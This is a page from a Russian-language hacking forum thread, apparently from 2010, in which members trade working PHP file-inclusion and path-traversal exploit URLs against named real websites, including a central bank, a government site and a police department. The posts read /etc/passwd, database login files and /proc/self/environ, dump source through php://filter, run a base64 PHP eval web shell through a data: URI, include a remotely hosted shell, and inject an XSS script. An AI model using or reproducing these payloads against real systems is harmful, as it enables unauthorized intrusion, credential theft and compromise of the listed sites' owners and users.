PHP Иньекции

Discussion in 'Уязвимости' started by Joker-jar, 20 Apr 2007.

  1. Getty

    Getty Banned

    Joined:
    17 Jun 2010
    Messages:
    104
    Likes Received:
    1
    Reputations:
    0
    Remote File Inclusion
    http://www.svetyashki.ru/gallery.php?page= http://www.svetyashki.ru/gallery.php?page=phpinfo(); Konqi: вместо шелла пишем [URL]
     
    #1161 Getty, 7 Jul 2010
    Last edited by a moderator: 8 Jul 2010
  2. Byte_

    Byte_ Elder - Старейшина

    Joined:
    7 Sep 2008
    Messages:
    143
    Likes Received:
    34
    Reputations:
    2
    Code:
    http://selling-avto.com/index1.php?con=[URL]
    Можно подключить любой php файл, например:
    Code:
    http://selling-avto.com/index1.php?con=http://mysite.ru/myshell
     
    2 people like this.
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.dmt-biax.com/i-make.php?user=dmt&vorlage=vorlage.php&file=../../../../../../../../../etc/passwd&newsid=1945

    PR-6

    -----------
    http://www.ictprofiles.at/index.php?file=../../../../../../../../../../etc/passwd&branche=5.


    PR-6

    -----------
    http://www.gusswerk.net/i-make.php?user=gusswerk&vorlage=flash.php&file=../../../../../../../../../etc/passwd&newsid=2250

    PR-4
     
    _________________________
    #1163 Konqi, 12 Jul 2010
    Last edited: 12 Jul 2010
    3 people like this.
  4. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    http://www.crusaders.cz/index.php?file=../../../../../../../../etc/passwd
    http://www.peteralsop.com/index.php?inc=../../../../../../../../../etc/issue
    http://agrofranjalp.com.ar/page/2/index.php?inc=../../../../../../../../../../etc/passwd
    http://www.ratikaclinic.com/index.php?file=/home/ratikacl/public_html/.htaccess
     
    1 person likes this.
  5. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    http://nobeltec.ru/index.php?link=[RFI]
    http://nobeltec.ru/news/data/upimages/dem0n_ra/img.php
     
    1 person likes this.
  6. Dare

    Dare Elder - Старейшина

    Joined:
    26 Apr 2010
    Messages:
    53
    Likes Received:
    24
    Reputations:
    17
    http://alta-tour.net/priem_spb.php?id=../../../../etc/passswd
     
  7. so_newbie

    so_newbie Member

    Joined:
    6 Jul 2010
    Messages:
    33
    Likes Received:
    14
    Reputations:
    9
    Code:
    http://mardigrasday.com/mardigras/food.php?file=../../../../etc/passwd
    PR - 5

    Code:
    http://www.kkm.lv/modules.php?file=../../../../../../../etc/passwd%00&name=Forums&p=256953
    тИЦ - 30
    PR - 3
     
  8. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    Code:
    http://alternativeautosource.net/index.php?link=php://filter/convert.base64-encode/resource=index.php
    декодируем из base64 и получаем исходник страницы
    Code:
    http://nobeltec.ru/index.php?link=data:application/x-httpd-php;base64,PD8gZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTsgPz4=&cmd=phpinfo();
    смотри в код страницы и видим там phpinfo
     
    #1168 daniel_1024, 4 Aug 2010
    Last edited: 4 Aug 2010
    1 person likes this.
  9. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    Code:
    http://www.tybet.ru/cgi-bin/index.pl?id=10&artid=/etc/passwd
     
  10. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    PR - 3



    Code:
    http://www.asictonline.org/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
     
    _________________________
  11. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    http://www.speakerplans.com/index.php?id=index.php%00
     
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://art.less.ly/index.php?dir=../../../../../../../../../../../../etc
    http://art.less.ly/index.php?dir=////////////var/www
    opendir()
    readdir()
    closedir()
     
    _________________________
    #1172 Konqi, 9 Aug 2010
    Last edited: 9 Aug 2010
    1 person likes this.
  13. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    Можно загружать любые файлы с сервера: :D
    Code:
    http://www.tuscanycable.com/download.php?file=../db_login.php
    Code:
    http://www.sosdogs.org/download.php?file=download.php
    
    Code:
    http://institut-africain-droit-environnement.org/download.php?file=Connect.php
     
    #1173 daniel_1024, 10 Aug 2010
    Last edited: 10 Aug 2010
    1 person likes this.
  14. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    http://www.arlingtonpd.org/index.asp?nextpg=/images/CALEAlogo.jpg

    ASP-инклюд
     
    5 people like this.
  15. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    http://www.da.gov.ph/newindex2.php?pass=/etc/passwd
     
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    это одинь из моих любимых сайтов, который я посещал в течении трех лет ( да и сейчас посещаю) :)

    http://lprussia.com/index.php?page=../../../../../../../../../../../../etc/passwd%00&id=photos&this_id=text

    +XSS

    http://lprussia.com/index.php?page="><ScRiPt>alert('Linkin Park Rulls')</ScRipT>&id=photos&this_id=text

    не делайте плохого :(
     
    _________________________
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://sims2pack.modthesims2.com/index.php?page=../index

    расширение так и не смог отрезать

    -----

    http://www.suprapolix.com/index.php?page=../index.php%00

    -----
    http://www.opticaldocumentsecurity.com/index.php?page=../../../../../../../../../../../../proc/self/environ
     
    _________________________
    #1177 Konqi, 19 Aug 2010
    Last edited: 19 Aug 2010
  18. so_newbie

    so_newbie Member

    Joined:
    6 Jul 2010
    Messages:
    33
    Likes Received:
    14
    Reputations:
    9
    Довольно известная мобильная социальная сеть GyPSii
    Code:
    http://www.gypsii.com/reader.cgi?id=../../../../../../../../etc/passwd%00
    
    PR - 5
     
  19. nullik

    nullik Member

    Joined:
    26 Feb 2010
    Messages:
    116
    Likes Received:
    44
    Reputations:
    1
    http://corporatedatinginternational.com/index.php?page=../../../../../etc/passwd
     
  20. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    BANCO CENTRAL DEL ECUADOR
    http://www.bce.fin.ec/docs.php?path=/docs.php
     
    #1180 Дирижабль, 23 Aug 2010
    Last edited: 23 Aug 2010
    2 people like this.